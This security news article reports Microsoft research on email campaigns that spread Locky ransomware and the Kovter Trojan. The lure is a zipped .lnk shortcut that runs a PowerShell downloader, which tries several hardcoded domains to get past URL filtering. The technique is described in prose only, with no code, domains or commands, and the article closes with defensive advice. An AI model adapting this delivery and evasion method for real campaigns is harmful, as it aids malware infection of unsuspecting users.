Researchers at Microsoft’s Malware Protection Center have spotted malicious email campaigns using .lnk attachments to spread Locky ransomware and the Kovter click-fraud Trojan, the first time criminals have simultaneously distributed both pieces of malware.
According to Microsoft, the .lnk file now supports a potent script that contain links to multiple hardcoded domains from which it attempts to download either malware. A .lnk file is a shortcut file that points to an executable file. In this case, email recipients receive a .zip archive attachment that contains a .lnk file, that hides a versatile PowerShell script.
“This new script has no less than five different hardcoded domains from which it attempts to download the payload malware. In addition to Locky, this script also now downloads Kovter,” wrote Microsoft in a blog post explaining its research.
In October, Microsoft spotted cybercriminals switching from using malicious .wsf files in spam campaigns to ones using shortcut files (.lnk extension) that contain PowerShell commands to download and run Locky. At the time, Microsoft said this was notable because it signaled a strategy change by crooks who had been previously relying on the Trojan downloader Nemucod to distribute Locky.
In this most recent campaign, emails containing the .lnk file (contained inside the .zip file) attempt to trick recipients into opening the .zip file as part of a receipt for a spoofed U.S. Postal Service delivery email. If the .zip file is opened and the .lnk shortcut file is executed a PowerShell script is initiated, Microsoft said.
“The script contains the hardcoded domains and the parameters it uses for the download routine. For each attempt to download, it checks if the download is successful and if the downloaded file is at least 10KB. It stops trying to download when these conditions are met, or when it has gone through the five domains twice with no successful download,” wrote the Microsoft Malware Protection Center team.
The use of multiple domains is an obfuscation technique used to throw off URL filtering security solutions, Microsoft said. Instead of the script relying on one URL, that may be blacklisted, it can increase the odds of success by adding additional domains. “All the script needs is one URL that is not blocked in order to successfully download malware,” Microsoft wrote.
Additionally, cybercriminals “have the option to update the malware payload pointed to by the URLs, change the URLs in the script, or do both to try and evade detection,” according to Microsoft.
Since it began tracking, Microsoft notes that cybercriminals update the payload downloaded by the PowerShell script, sometimes on a daily basis. “During our testing, the malware payload was updated with newer versions of either Locky and Kovter, but technically the attackers can change this to any malware they wish to use,” it wrote.
To Microsoft, Locky and Kovter’s shared distribution suggests that the cybercriminals behind the attacks may also be selling or renting servers as pay-per-install service.
This is not the first times security researchers have seen Locky and Kovter so closely associated within a campaign. Last month, PhishMe researchers spotted an email campaign that contained a similar .zip archive that contained an obfuscated JScript file capable of downloading Kovter and Locky from compromised Joomla websites.
To avoid falling prey, Microsoft suggests Windows 10 users lock down PowerShell version 5 to “Constrained Mode.” This limits the extended language features that can lead to unverifiable code execution such as direct .NET scripting, invocation of Win32 APIs via the Add-Type cmdlet, and interaction with COM objects, said Microsoft.